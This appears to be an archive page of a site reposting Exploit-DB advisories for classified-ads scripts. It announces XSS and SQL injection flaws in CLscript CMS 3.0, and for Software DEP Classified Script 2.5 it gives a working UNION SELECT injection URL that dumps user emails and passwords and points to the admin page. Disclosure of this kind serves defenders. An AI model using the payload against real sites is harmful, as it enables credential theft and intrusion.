You are browsing the archive for Classified.

by Exploit DB

Classified Portal CMS Multiple Vulnerabilities

July 5, 2012 in Exploits, SQLi, XSS

With the professionally developed Classified-Portal CLscript 3.0 can Visitors post Classifieds and use many new Features. The Classifieds Software is search Engine friendly to gain better Promotion Aspects at search Engines. The whole Structure is manageable through easy to use AdminPanel.
In developing the Classified Software, we have geared ourselves to the most successful Classifieds-Sites on the Internet. You can generate real Income from your Classifieds Website.

The Vulnerability Laboratory Research Team discovered multiple critical web vulnerabilities in the CLscript v3.0 Content Management System.

CLscript CMS version 3.0 suffers from cross site scripting and remote SQL injection vulnerabilities.
View Source
CLscript CMS v3.0 Multiple Vulnerabilities
Exploit-DB updates

Tags: , , , , , , , , , , , Comments Off

by Exploit DB

Software DEP Classified Script SQL Injection Vulnerability

April 13, 2012 in Exploits, SQLi

Software DEP Classified Script 2.5 SQL Injection Vulnerability
Author: h0rd
Contact: h0rd[at]null.net
homepage: http://h0rd.net
download: http://www.softwaredep.com/classified-script.html

PoC exploit:

http://[host]/ad_detail.php?id=null union select 1,2,3,4,concat(email,0x3a,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user–

login page:

http://[host]/[script]/admin/

Exploit-DB updates

Tags: , , , , , , Comments Off